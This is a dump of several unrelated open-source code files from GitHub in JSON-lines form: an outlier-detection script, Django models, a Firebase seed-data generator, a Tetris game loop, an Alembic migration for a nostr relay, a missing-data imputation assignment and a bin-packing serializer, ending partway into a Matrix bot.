y_pred_test2\n if dataset == \"cyprus\":\n y_pred_manual = y_pred_manual2\n\nprint(\"Running time:\", round(perf_counter()-t, 1), \"seconds\")\nprint(\"Train accuracy score:\", round(accuracy_score(y_train, y_pred_train), 4))\nprint(\"Train F1 score:\", round(f1_score(y_train, y_pred_train, average=\"macro\"), 4))\nprint(\"Test accuracy score:\", round(accuracy_score(y_test, y_pred_test), 4))\nprint(\"Test F1 score:\", round(f1_score(y_test, y_pred_test, average=\"macro\"), 4))\nprint(confusion_matrix(y_test, y_pred_test))\nif dataset == \"cyprus\" and len(manual_outliers) > 0:\n print(y_pred_manual)\n print(\"Percentage of manual outliers found by the system: {pct}%\".format(\n pct=100*len([y for y in y_pred_manual if y == 1])/len(y_pred_manual)))\n\nif method != \"clustering\":\n output = []\n for i, x in enumerate(x_init_test):\n output.append([X_features_test[i], x_init_test[i], y_pred_test[i]])\n pickle.dump(output, open(\n f\"trajectory_features_labeled_{dataset}.pkl\", \"wb\"))\n","repo_name":"amoavinis/trajectory-outliers","sub_path":"ProposedApproach/Proposed.py","file_name":"Proposed.py","file_ext":"py","file_size_in_byte":10934,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13436242036","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\n\nclass FormModel(models.Model):\n name = models.CharField(max_length=60, verbose_name=u'name form')\n user = models.ForeignKey(User, verbose_name=u'user form')\n created = models.DateField(auto_now_add=True, verbose_name=u'date created')\n description = models.TextField(verbose_name=u'description of form')\n\n def get_absolute_url(self):\n from django.core.urlresolvers import reverse\n\n return reverse('form', args=(self.id, ))\n\n def __unicode__(self):\n return self.name\n\n\nclass ElementForm(models.Model):\n type_element = models.CharField(max_length=20, verbose_name=u'type element form')\n label = models.CharField(max_length=60, verbose_name=u'label element')\n description = models.CharField(max_length=120, verbose_name=u'description element')\n width = models.IntegerField(verbose_name=u'width element')\n name = models.CharField(max_length=20, verbose_name=u'name element')\n type_input = models.CharField(max_length=20, verbose_name=u'type input', default='-')\n options = models.TextField(verbose_name=u'options select')\n number = models.IntegerField(verbose_name=u'number element', default=-1)\n form = models.ForeignKey(FormModel, verbose_name=u'form of element')\n\n\n def __unicode__(self):\n return u'%s type: %s' % (self.form.name, self.type_element)","repo_name":"DmitryDmitrienko/kube-form-editor","sub_path":"editorform/editor/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"61182746","text":"import random\nfrom datetime import datetime, timedelta\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\nimport pandas as pd\nimport requests\n\n\n\nclass Job_List:\n\n # Creating and uploading data to Workers collection on firebase\n\n def __init__(self):\n\n self.job_list = []\n\n self.organisation_list = []\n\n self.skills_list = None\n\n self.experience_list = []\n\n self.start_date = None\n\n self.end_date = None\n\n self.start_date_list = []\n\n self.end_date_list = []\n\n self.pincode_list = [\n '110001', # Delhi\n '400001', # Mumbai\n '700001', # Kolkata\n ]\n \"\"\" \n '600001', # Chennai\n '560001', # Bangalore\n '411001', # Pune\n '380001', # Ahmedabad\n '500001', # Hyderabad\n '302001', # Jaipur\n '800001', # Patna\n '560066', # Electronic City, Bangalore\n '400086', # Andheri, Mumbai\n '600040', # T. Nagar, Chennai\n '411014', # Hinjewadi, Pune\n '500081', # Gachibowli, Hyderabad\n '560008', # Malleshwaram, Bangalore\n '380009', # Navrangpura, Ahmedabad\n '700091', # Salt Lake City, Kolkata\n '110020', # Hauz Khas, Delhi\n '302017' # Malviya Nagar, Jaipur\n # Add more PIN codes here...\n ]\n \"\"\"\n\n\n\n self.primary_skills = [\n \"Construction Laborer\",\n \"Agricultural Worker\",\n \"Mason\",\n \"Carpenter\",\n \"Painter\",\n \"Plumber\",\n ]\n \"\"\"\n \"Electrician\",\n \"Welder\",\n \"Loader/Unloader\",\n \"Housekeeper\",\n \"Janitor\",\n \"Cleaner\",\n \"Gardener\",\n \"Security Guard\",\n \"Factory Worker\",\n \"Packaging Worker\",\n \"Helper\",\n \"Driver\",\n \"Delivery Person\",\n \"Garbage Collector\",\n \"Street Vendor\",\n \"Farm Laborer\",\n \"Brick Maker\",\n \"Road Sweeper\",\n \"Tea Picker\",\n \"Textile Worker\",\n \"Fisherman\",\n \"Construction Site Watchman\",\n \"Cycle Rickshaw Puller\",\n \"Auto Rickshaw Driver\"\n ]\n \"\"\"\n\n self.secondary_skills = [\n \"Construction Laborer\",\n \"Agricultural Worker\",\n \"Mason\"\n ]\n \"\"\"\n \"Carpenter\",\n \"Painter\",\n \"Plumber\",\n \"Electrician\",\n \"Welder\",\n \"Loader/Unloader\",\n \"Housekeeper\",\n \"Janitor\",\n \"Cleaner\",\n \"Gardener\",\n \"Security Guard\",\n \"Factory Worker\",\n \"Packaging Worker\",\n \"Helper\",\n \"Driver\",\n \"Delivery Person\",\n \"Garbage Collector\",\n \"Street Vendor\",\n \"Farm Laborer\",\n \"Brick Maker\",\n \"Road Sweeper\",\n \"Tea Picker\",\n \"Textile Worker\",\n \"Fisherman\",\n \"Construction Site Watchman\",\n \"Cycle Rickshaw Puller\",\n \"Auto Rickshaw Driver\"\n \"\"\"\n\n\n self.qualifications = [\n '8th Pass',\n '10th Pass',\n '12th Pass',\n 'Graduation',\n \"Post graduation\",\n ]\n\n self.company_names = [\n \"Shramik Solutions\",\n \"Kamgar Staffing\",\n \"Kaushal Labor Co.\",\n ]\n \"\"\"\n \"Naukari Services\",\n \"Mazdoor Manpower\",\n \"SkillKart Staffing\",\n \"Kadambari Labor Solutions\",\n \"Saksham Labor Providers\",\n \"Kushal LaborForce\",\n \"Samarth Skilled Staffing\",\n \"Shram Sangathan Agency\",\n \"KaamChakra Labor Co.\",\n \"Rozgar Staffing\",\n \"Hunar Labor Solutions\",\n \"Sangharsh Labor Providers\",\n \"Sambhav Labor Group\",\n \"Yashasvi Labor Agency\",\n \"Kausalya Skilled Staffing\",\n \"KadamKadam Labor Solutions\",\n \"Karigar Staffing\",\n \"Kausal Labor Co.\",\n \"Samarpan Labor Providers\",\n \"Pragati Skilled Staffing\",\n \"Sambandh Labor Solutions\",\n \"Karyarat Labor Agency\",\n \"KaamSevak Staffing\",\n \"Kushalta Labor Group\",\n \"Samarthak Labor Solutions\",\n \"Sashakt Labor Agency\",\n \"Nirmaan Staffing\",\n \"KarmaYogi Labor Co.\"\n \"\"\"\n\n self.job_titles = [\n \"Laborer\",\n \"Janitor\",\n \"Warehouse Worker\",\n ]\n \"\"\"\n \"Production Worker\",\n \"Cleaner\",\n \"Farm Worker\",\n \"Construction Helper\",\n \"Kitchen Staff\",\n \"Landscaping Laborer\",\n \"Housekeeper\",\n \"Packer\",\n \"Delivery Driver\",\n \"Assembler\",\n \"Dishwasher\",\n \"Retail Associate\",\n \"Security Guard\",\n \"Valet Parking Attendant\",\n \"Car Wash Attendant\",\n \"Food Service Worker\",\n \"Stock Clerk\",\n \"Cashier\",\n \"Laundry Attendant\",\n \"Gardener\",\n \"Garbage Collector\",\n \"Mover\",\n \"Security Officer\",\n \"General Maintenance Worker\",\n \"Data Entry Clerk\",\n \"Groundskeeper\",\n \"Production Operator\"\n \"\"\"\n self.skill_level = [\n 'Less than 1 year',\n '1 to 10 years',\n 'More than 10 years'\n ]\n \n def location_api(self):\n\n self.pincode = random.choice(self.pincode_list)\n\n api = requests.get('https://api.postalpincode.in/pincode/' + self.pincode)\n\n response = api.json()\n\n \n data = response[0]['PostOffice'][0]\n self.area = data['Region']\n self.district = data['District']\n self.state = data['State']\n\n def firebase(self):\n cred = credentials.Certificate('jansakti-andrew-firebase-adminsdk.json')\n firebase_admin.initialize_app(cred)\n self.db = firestore.client()\n return self.db\n\n def generate_dates(self):\n\n current_date = datetime.now()\n\n start_date_offset = random.randint(1, 30)\n\n self.start_date = current_date + timedelta(days=start_date_offset)\n\n end_date_offset = random.randint(1, start_date_offset)\n\n self.end_date = self.start_date + timedelta(days=end_date_offset)\n\n def generate_max_age(self):\n\n min_age = 18\n\n max_age = min_age + 30 + random.randint(1,17)\n\n return max_age\n \n def generate_organisation_data(self):\n self.location_api()\n organisation = {\n 'area': self.area,\n 'district': self.district,\n 'state': self.state,\n 'created_on': datetime.now(),\n 'organisation_name': random.choice(self.company_names)\n }\n\n self.organisation_list.append(organisation)\n\n return self.organisation_list\n \n def randomise(self):\n\n self.organisation_list = [] \n\n random_organisation = pd.DataFrame(self.generate_organisation_data())\n return random_organisation\n \n def upload_data(self):\n\n pd.set_option('display.max_columns', None)\n\n df = self.randomise().transpose()\n\n dic = df.to_dict()\n\n for idx in range(0, len(dic)):\n\n self.db.collection('Organisations').add(dic[idx])\n \n def generate_job_data(self):\n\n self.location_api()\n self.generate_dates()\n \n job = {\n 'organisation_name': random.choice(self.company_names),\n 'job_title': random.choice(self.job_titles),\n 'gender': random.choice(['Male', 'Female', 'Gender Neutral']),\n 'min_qualification': random.choice(self.qualifications),\n 'primary_skills': random.choice(self.primary_skills),\n 'secondary_skills': random.sample(self.secondary_skills, random.randint(1, 3)),\n 'skill_level': random.choice(self.skill_level),\n 'state': self.state,\n 'district': self.district,\n 'area': self.area,\n 'pincode': self.pincode,\n 'min_age': 18,\n 'max_age': self.generate_max_age(),\n 'start_date': self.start_date.strftime(\"%d/%m/%y\"),\n 'end_date': self.end_date.strftime(\"%d/%m/%y\"),\n 'filled': random.randint(0, 20),\n 'number_of_vacancies': random.randint(0,20),\n }\n\n self.job_list.append(job)\n\n return self.job_list\n \n def randomise_subcollection_data(self):\n\n random_job_choice = random.randint(1,5)\n\n for _ in range(random_job_choice):\n\n self.random_job_data = pd.DataFrame(self.generate_job_data())\n\n def upload_subcollection_data(self):\n\n self.randomise_subcollection_data()\n\n collection_ref = self.db.collection('Organisations')\n query = collection_ref.order_by('created_on', direction=firestore.Query.DESCENDING).limit(1)\n documents = query.get()\n\n for parent_doc in documents:\n parent_doc_id = parent_doc.id\n parent_doc_ref = collection_ref.document(parent_doc_id)\n\n jobs_subcollection_ref = parent_doc_ref.collection('Jobs')\n\n for _, job_row in self.random_job_data.iterrows():\n \n jobs_subcollection_ref.add(job_row.to_dict())\n\n self.random_job_data.drop(self.random_job_data.index)\n\n \njl = Job_List()\n\njl.firebase()\n\nfor _ in range(10):\n jl.upload_data()\n jl.upload_subcollection_data()\n","repo_name":"invenics-andrewclark/Recommendation_Engine","sub_path":"Job_List.py","file_name":"Job_List.py","file_ext":"py","file_size_in_byte":9857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72137911847","text":"import pygame\nfrom pygame.mixer import find_channel\n\nfrom Tools import terminate\nfrom Tools.Image import load_image\n\nfrom PyGame_Additions import SingleSprite\n\nfrom GUI_Stages.game_interface import GameInterface\nfrom Game_Parts import GameBoard\n\nfrom constants import SCREEN_SIZE\nfrom game_events import PLAY_SCORE_SOUND\n\nRUNNING = True\n\npygame.init()\nSCREEN = pygame.display.set_mode(SCREEN_SIZE)\npygame.display.set_icon(load_image(\"icon.png\", -1))\npygame.display.set_caption(\"Python Tetris v2.0\")\nCLOCK = pygame.time.Clock()\nFRAMERATE_LOCK = 60\n\nFON = SingleSprite(\"background.png\")\n\npygame.mixer.music.load('data/music/main_theme.ogg')\npygame.mixer.music.play(-1)\nSCORE_SOUND = pygame.mixer.Sound('data/music/deleting_line_sound.wav')\nSCORE_SOUND.set_volume(0.4)\n\nINTERFACE = GameInterface()\nGAME = GameBoard()\n\n\nwhile RUNNING:\n FON.draw(SCREEN)\n\n INTERFACE.update_without_event(CLOCK)\n GAME.update_without_event(pygame, pygame.time.get_ticks())\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n terminate()\n\n if event.type == PLAY_SCORE_SOUND:\n channel = find_channel(True)\n channel.play(SCORE_SOUND)\n\n INTERFACE.update(pygame, event)\n GAME.update(pygame, event)\n\n GAME.draw(SCREEN)\n INTERFACE.draw(SCREEN)\n\n CLOCK.tick(60)\n pygame.display.flip()\n","repo_name":"Kirill-Lekhov/tetris","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14631481664","text":"# -*- coding: utf-8 -*-\nimport vovp\nimport torch as th\nimport multiprocessing as mp\n\ndef subprocess_client(tensor):\n print(tensor)\n del tensor\n # vovp.get_client().list()\n\n\ndef test_basic_client():\n client = vovp.init_client(\"/tmp/dgl_socket\")\n vovp.init_reduction()\n # vovp.\n a = th.tensor([[1, 2, 3], [5, 4, 6]], device=\"cuda\")\n ctx = mp.get_context('spawn')\n queue = ctx.Queue()\n barrier = ctx.Barrier()\n p = ctx.Process(target=subprocess_client, args=(a, barrier))\n p.start()\n del a\n p.join()\n # ret_list = queue.get()\n # for ret in ret_list:\n # assert ret\n\nif __name__==\"__main__\":\n test_basic_client()\n","repo_name":"VoVAllen/vovp","sub_path":"tests/test_mp_pickle.py","file_name":"test_mp_pickle.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"72122242407","text":"\"\"\"Initial tables\n\nRevision ID: e748549d8d91\nRevises: \nCreate Date: 2023-01-12 19:21:58.431417\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.exc import OperationalError\n\n# revision identifiers, used by Alembic.\nrevision = \"e748549d8d91\"\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n bind = op.get_bind()\n if bind.engine.name == \"sqlite\":\n binary_type = sa.BLOB()\n json_type = sa.JSON()\n else:\n from sqlalchemy.dialects.postgresql import BYTEA, JSONB\n\n binary_type = BYTEA()\n json_type = JSONB()\n\n # ### commands auto generated by Alembic - please adjust! ###\n op.execute(\"DROP TABLE IF EXISTS tags\")\n op.execute(\"DROP TABLE IF EXISTS verification\")\n op.execute(\"DROP TABLE IF EXISTS events\")\n try:\n op.create_table(\n \"auth\",\n sa.Column(\"pubkey\", sa.Text(), nullable=False),\n sa.Column(\"roles\", sa.Text(), nullable=True),\n sa.Column(\"created\", sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint(\"pubkey\"),\n )\n except OperationalError:\n print(\"Auth table already exists\")\n\n op.create_table(\n \"events\",\n sa.Column(\"id\", binary_type, nullable=False),\n sa.Column(\"created_at\", sa.Integer(), nullable=True),\n sa.Column(\"kind\", sa.Integer(), nullable=True),\n sa.Column(\"pubkey\", binary_type, nullable=True),\n sa.Column(\"tags\", json_type, nullable=True),\n sa.Column(\"sig\", binary_type, nullable=True),\n sa.Column(\"content\", sa.Text(), nullable=True),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.create_index(\"createdidx\", \"events\", [\"created_at\"], unique=False)\n op.create_index(\"kindidx\", \"events\", [\"kind\"], unique=False)\n op.create_index(\"pubkeyidx\", \"events\", [\"pubkey\"], unique=False)\n try:\n op.create_table(\n \"identity\",\n sa.Column(\"identifier\", sa.Text(), nullable=False),\n sa.Column(\"pubkey\", sa.Text(), nullable=True),\n sa.Column(\"relays\", json_type, nullable=True),\n sa.PrimaryKeyConstraint(\"identifier\"),\n )\n except OperationalError:\n print(\"Identity table already exists\")\n\n op.create_table(\n \"tags\",\n sa.Column(\"id\", binary_type, nullable=True),\n sa.Column(\"name\", sa.Text(), nullable=True),\n sa.Column(\"value\", sa.Text(), nullable=True),\n sa.ForeignKeyConstraint([\"id\"], [\"events.id\"], ondelete=\"CASCADE\"),\n sa.UniqueConstraint(\"id\", \"name\", \"value\", name=\"unique_tag\"),\n )\n op.create_index(\"tagidx\", \"tags\", [\"name\", \"value\"], unique=False)\n op.create_table(\n \"verification\",\n sa.Column(\"id\", sa.Integer(), nullable=False),\n sa.Column(\"identifier\", sa.Text(), nullable=True),\n sa.Column(\"metadata_id\", binary_type, nullable=True),\n sa.Column(\"verified_at\", sa.TIMESTAMP(), nullable=True),\n sa.Column(\"failed_at\", sa.TIMESTAMP(), nullable=True),\n sa.ForeignKeyConstraint([\"metadata_id\"], [\"events.id\"], ondelete=\"CASCADE\"),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.create_index(\"identifieridx\", \"verification\", [\"identifier\"], unique=False)\n op.create_index(\"metadataidx\", \"verification\", [\"metadata_id\"], unique=False)\n op.create_index(\"verifiedidx\", \"verification\", [\"verified_at\"], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(\"verifiedidx\", table_name=\"verification\")\n op.drop_index(\"metadataidx\", table_name=\"verification\")\n op.drop_index(\"identifieridx\", table_name=\"verification\")\n op.drop_table(\"verification\")\n op.drop_index(\"tag_idx\", table_name=\"tags\")\n op.drop_table(\"tags\")\n op.drop_table(\"identity\")\n op.drop_index(\"pkidx\", table_name=\"events\")\n op.drop_index(\"kidx\", table_name=\"events\")\n op.drop_index(\"cidx\", table_name=\"events\")\n op.drop_table(\"events\")\n op.drop_table(\"auth\")\n # ### end Alembic commands ###\n","repo_name":"davestgermain/nostr_relay","sub_path":"nostr_relay/alembic/versions/e748549d8d91_initial_tables.py","file_name":"e748549d8d91_initial_tables.py","file_ext":"py","file_size_in_byte":4064,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"72012428968","text":"# Author: Aidan Kierans\r\n\r\nimport pandas as pd\r\nfrom math import sqrt\r\nfrom multiprocessing import Pool\r\n\r\n# Make the data sets into DataFrames\r\ndf05 = pd.read_csv('dataset_missing05.csv')\r\ndf20 = pd.read_csv('dataset_missing20.csv')\r\ndf_complete = pd.read_csv('dataset_complete(1).csv')\r\n\r\n# Convert the first eight columns to float64s, and the ?s into NaNs for pandas\r\ndf05['F1'] = pd.to_numeric(df05['F1'], errors='coerce')\r\ndf05['F2'] = pd.to_numeric(df05['F2'], errors='coerce')\r\ndf05['F3'] = pd.to_numeric(df05['F3'], errors='coerce')\r\ndf05['F4'] = pd.to_numeric(df05['F4'], errors='coerce')\r\ndf05['F5'] = pd.to_numeric(df05['F5'], errors='coerce')\r\ndf05['F6'] = pd.to_numeric(df05['F6'], errors='coerce')\r\ndf05['F7'] = pd.to_numeric(df05['F7'], errors='coerce')\r\ndf05['F8'] = pd.to_numeric(df05['F8'], errors='coerce')\r\n\r\ndf20['F1'] = pd.to_numeric(df20['F1'], errors='coerce')\r\ndf20['F2'] = pd.to_numeric(df20['F2'], errors='coerce')\r\ndf20['F3'] = pd.to_numeric(df20['F3'], errors='coerce')\r\ndf20['F4'] = pd.to_numeric(df20['F4'], errors='coerce')\r\ndf20['F5'] = pd.to_numeric(df20['F5'], errors='coerce')\r\ndf20['F6'] = pd.to_numeric(df20['F6'], errors='coerce')\r\ndf20['F7'] = pd.to_numeric(df20['F7'], errors='coerce')\r\ndf20['F8'] = pd.to_numeric(df20['F8'], errors='coerce')\r\n\r\n# set precision to five digits after the decimal point\r\ndf05 = df05.round(decimals=5)\r\ndf20 = df20.round(decimals=5)\r\ndf_complete = df_complete.round(decimals=5)\r\n\r\n# mean imputation\r\ndf05_mean = df05.fillna(df05.mean())\r\ndf20_mean = df20.fillna(df20.mean())\r\n\r\n\r\n# conditional mean imputation\r\n# add the original index of each row to the df so that they can be put back in this order later\r\ndf05.reset_index(inplace=True)\r\ndf20.reset_index(inplace=True)\r\n\r\n\r\n# sort the rows of a df back into the original order, then drop the 'index' column\r\ndef reset_order(df):\r\n return df.sort_values('index').filter(items=['F1', 'F2', 'F3', 'F4', 'F5', 'F6', 'F7', 'F8', 'Class'])\r\n\r\n\r\n# split each df into a separate df for each condition - this could probably be optimized\r\ndf05_yes = df05.groupby('Class').get_group('Yes')\r\ndf05_no = df05.groupby('Class').get_group('No')\r\ndf20_yes = df20.groupby('Class').get_group('Yes')\r\ndf20_no = df20.groupby('Class').get_group('No')\r\n\r\ndf05_c_mean = df05_yes.fillna(df05_yes.mean()).append(df05_no.fillna(df05_no.mean()))\r\ndf20_c_mean = df20_yes.fillna(df20_yes.mean()).append(df20_no.fillna(df20_no.mean()))\r\n\r\ndf05_c_mean = reset_order(df05_c_mean)\r\ndf20_c_mean = reset_order(df20_c_mean)\r\n\r\n\r\n# hot deck imputation\r\n# calculate the euclidean distances between two rows\r\ndef distance(row1, row2, mask):\r\n # remove columns with missing values, convert rows from series to lists here if I need to.\r\n r1 = row1.loc[mask] # .to_list()\r\n r2 = row2.loc[mask] # .to_list()\r\n # compute and return the euclidean distance between the rows\r\n if r1.size > 0:\r\n return sqrt(sum([(x - y) ** 2 for x, y in zip(r1, r2)])) / r1.size\r\n else:\r\n return 1\r\n\r\n\r\ndef hot_deck(df):\r\n df_hd = df.copy()\r\n df = df.filter(like='F', axis=1)\r\n df_temp = df.assign(Distance=1.0)\r\n for i in df.iterrows():\r\n # make sure this row has missing values in the first place before trying to impute them\r\n if i[1].hasnans:\r\n # find the distance between i and each other row\r\n for j in df.iterrows():\r\n # skip this iteration if i and j are the same row; i is as far as possible from itself by default\r\n if i[0] == j[0]:\r\n continue\r\n # form a boolean mask that's true for each column that i and j both have a value in\r\n match = i[1].notna() & j[1].notna()\r\n # pass i, j, and the mask to distance() and add the result to the Distance column of df_temp\r\n df_temp.at[j[0], 'Distance'] = distance(i[1], j[1], match)\r\n # sort the resulting data so that the shortest distance is moved to the top and i is at the bottom\r\n df_temp = df_temp.sort_values('Distance')\r\n # pick the available values from the closest row until i is filled\r\n for k in df_temp.iterrows():\r\n # if the ith row of the df still has missing values...\r\n if df_hd.loc[i[0]].hasnans:\r\n # ...keep trying to impute them\r\n temp = df_hd.loc[i[0]].combine_first(k[1])\r\n df_hd.loc[i[0]] = temp\r\n else:\r\n break\r\n # if i[0] % 500 == 0:\r\n # print(\"i[0]: \" + str(i[0]))\r\n return df_hd\r\n\r\n\r\ndef set_df05_hd():\r\n # print(\"Finding df05_hd\")\r\n df = hot_deck(df05)\r\n df.round(decimals=5).to_csv('V00819990_missing05_imputed_hd.csv', index=False)\r\n\r\n\r\ndef set_df20_hd():\r\n # print(\"Finding df20_hd\")\r\n df = hot_deck(df20)\r\n df.round(decimals=5).to_csv('V00819990_missing20_imputed_hd.csv', index=False)\r\n\r\n\r\n# conditional hot deck imputation\r\ndef set_df05_chd():\r\n print(\"Finding df05_chd\")\r\n df = reset_order(hot_deck(df05_yes).append(hot_deck(df05_no)))\r\n df.round(decimals=5).to_csv('V00819990_missing05_imputed_hd_conditional.csv', index=False)\r\n\r\n\r\ndef set_df20_chd():\r\n print(\"Finding df20_chd\")\r\n df = reset_order(hot_deck(df20_yes).append(hot_deck(df20_no)))\r\n df.round(decimals=5).to_csv('V00819990_missing20_imputed_hd_conditional.csv', index=False)\r\n\r\n\r\n# impute asynchronously\r\nif __name__ == '__main__':\r\n pool = Pool(processes=2)\r\n\r\n # Start each process\r\n pr05hd = pool.apply_async(set_df05_hd)\r\n pr20hd = pool.apply_async(set_df20_hd)\r\n pr05chd = pool.apply_async(set_df05_chd)\r\n pr20chd = pool.apply_async(set_df20_chd)\r\n\r\n pool.close()\r\n pool.join()\r\n\r\n # calculation of mean absolute error\r\n # if not for this assignment's constraint that the code must be in a .py file, mean_ae would be Cython\r\n def mean_ae(df_missing, df_imputed, df_correct):\r\n ae = 0\r\n count = 0\r\n df_missing = df_missing.filter(like='F', axis=1)\r\n df_imputed = df_imputed.filter(like='F', axis=1)\r\n df_correct = df_correct.filter(like='F', axis=1)\r\n for r in df_missing.iterrows():\r\n for item in r[1].iteritems():\r\n ae += abs(df_imputed.at[r[0], item[0]] - df_correct.at[r[0], item[0]])\r\n count += 1\r\n # Divide the sum of errors by the number of errors, and round to the nearest ten-thousandth\r\n return round(ae/count, 4)\r\n\r\n # Load the hot-deck-imputed data back into Dataframes\r\n df05_hd = pd.read_csv('V00819990_missing05_imputed_hd.csv')\r\n df20_hd = pd.read_csv('V00819990_missing20_imputed_hd.csv')\r\n df05_chd = pd.read_csv('V00819990_missing05_imputed_hd_conditional.csv')\r\n df20_chd = pd.read_csv('V00819990_missing20_imputed_hd_conditional.csv')\r\n\r\n # make sure the dfs only include the columns they started with\r\n df05_mean = df05_mean.filter(items=['F1', 'F2', 'F3', 'F4', 'F5', 'F6', 'F7', 'F8', 'Class'])\r\n df05_c_mean = df05_c_mean.filter(items=['F1', 'F2', 'F3', 'F4', 'F5', 'F6', 'F7', 'F8', 'Class'])\r\n df05_hd = df05_hd.filter(items=['F1', 'F2', 'F3', 'F4', 'F5', 'F6', 'F7', 'F8', 'Class'])\r\n df05_chd = df05_chd.filter(items=['F1', 'F2', 'F3', 'F4', 'F5', 'F6', 'F7', 'F8', 'Class'])\r\n df20_mean = df20_mean.filter(items=['F1', 'F2', 'F3', 'F4', 'F5', 'F6', 'F7', 'F8', 'Class'])\r\n df20_c_mean = df20_c_mean.filter(items=['F1', 'F2', 'F3', 'F4', 'F5', 'F6', 'F7', 'F8', 'Class'])\r\n df20_hd = df20_hd.filter(items=['F1', 'F2', 'F3', 'F4', 'F5', 'F6', 'F7', 'F8', 'Class'])\r\n df20_chd = df20_chd.filter(items=['F1', 'F2', 'F3', 'F4', 'F5', 'F6', 'F7', 'F8', 'Class'])\r\n\r\n # output each imputed df to csv (but first print mea and make sure that they have the right number of digits)\r\n print(f\"MAE_05_mean = \" + str(mean_ae(df05, df05_mean, df_complete)))\r\n df05_mean.round(decimals=5).to_csv('V00819990_missing05_imputed_mean.csv', index=False)\r\n\r\n print(\"MAE_05_mean_conditional = \" + str(mean_ae(df05, df05_c_mean, df_complete)))\r\n df05_c_mean.round(decimals=5).to_csv('V00819990_missing05_imputed_mean_conditional.csv', index=False)\r\n\r\n print(\"MAE_05_hd = \" + str(mean_ae(df05, df05_hd, df_complete)))\r\n\r\n print(\"MAE_05_hd_conditional = \" + str(mean_ae(df05, df05_chd, df_complete)))\r\n\r\n print(\"MAE_20_mean = \" + str(mean_ae(df20, df20_mean, df_complete)))\r\n df20_mean.round(decimals=5).to_csv('V00819990_missing20_imputed_mean.csv', index=False)\r\n\r\n print(\"MAE_20_mean_conditional = \" + str(mean_ae(df20, df20_c_mean, df_complete)))\r\n df20_c_mean.round(decimals=5).to_csv('V00819990_missing20_imputed_mean_conditional.csv', index=False)\r\n\r\n print(\"MAE_20_hd = \" + str(mean_ae(df20, df20_hd, df_complete)))\r\n\r\n print(\"MAE_20_hd_conditional = \" + str(mean_ae(df20, df20_chd, df_complete)))\r\n","repo_name":"aidankierans/Portfolio","sub_path":"CSV Data Imputation/a2.py","file_name":"a2.py","file_ext":"py","file_size_in_byte":8858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14080281776","text":"import json\nimport math\n\nimport os, sys\nimport re\n\nimport Model\n\nimport numpy as np\n\nclass BinSerialization:\n def __init__(self, dx, dy, dz, capacity = -1):\n self.Capacity = capacity\n self.Length = dx\n self.Width = dy\n self.Height = dz\n\nclass ItemSerialization:\n def __init__(self, id, dx, dy, dz, quantity):\n self.Id = id\n self.Volume = dx * dy * dz\n self.Length = dx\n self.Width = dy\n self.Height = dz\n self.Amount = quantity\n\nclass Converter:\n @staticmethod\n def ConvertFromSubproblem(items, container, timeLimit, instanceId):\n newContainer = BinSerialization(container.Dx, container.Dy, 1)\n newItems = []\n\n areaSum = 0.0\n for i, item in enumerate(items):\n newItem = ItemSerialization(i, item.Dx, item.Dy, 1, 1)\n\n areaSum += item.Dx * item.Dy\n\n newItems.append(newItem)\n\n numberOfItemTypes = len(newItems)\n\n epsilon = 100 * (1.0 - float(areaSum) / float(container.Dx * container.Dy))\n\n itemWidths = np.array([item.Dx for item in items])\n itemHeights = np.array([item.Dy for item in items])\n\n percentileDx25 = int(np.percentile(itemWidths, 25))\n percentileDx50 = int(np.percentile(itemWidths, 50))\n maxDx = max(itemWidths)\n\n percentileDy25 = int(np.percentile(itemHeights, 25))\n percentileDy50 = int(np.percentile(itemHeights, 50))\n maxDy = max(itemHeights)\n\n newJsonDict = {}\n\n name = f\"{instanceId}e{int(epsilon)}w{container.Dx}h{container.Dy}n{len(items)}dx-25-50-100_{percentileDx25}_{percentileDx50}_{maxDx}dy-25-50-100_{percentileDy25}_{percentileDy50}_{maxDy}t{int(timeLimit)}\"\n newJsonDict[\"Name\"] = name\n newJsonDict[\"InstanceType\"] = \"2D-OPP\"\n newJsonDict[\"NumberItemTypes\"] = numberOfItemTypes\n\n newJsonDict[\"Container\"] = newContainer\n newJsonDict[\"ItemTypes\"] = newItems\n\n with open(os.path.join(\"data\", \"2D-OPP-subproblems\", name + \".json\"), \"w\") as fp:\n print(f\"Instance {name} saved\")\n json.dump(newJsonDict, fp, indent=4, default=lambda x: x.__dict__)","repo_name":"ktnr/BinPacking2D","sub_path":"packingSolver/HelperIO.py","file_name":"HelperIO.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"53"} +{"seq_id":"5601267232","text":"from nio import (AsyncClient,\n AsyncClientConfig,\n LoginResponse,\n JoinedMembersError,\n JoinedMembersResponse,)\nfrom aiohttp import (ClientConnectionError,\n ServerDisconnectedError)\nfrom asyncio import sleep\nimport os\nimport json\nimport logging\n\nimport config as configfile\n\nlogger = logging.getLogger()\n\ndata_dir = configfile.datadir_bot\nif not os.path.exists(data_dir):\n os.mkdir(data_dir)\nconfig_file = f\"{data_dir}/credentials.json\"\nstore_path = f\"{data_dir}/store\"\n\n\nasync def write_details_to_disk(resp: LoginResponse, home_server) -> None:\n with 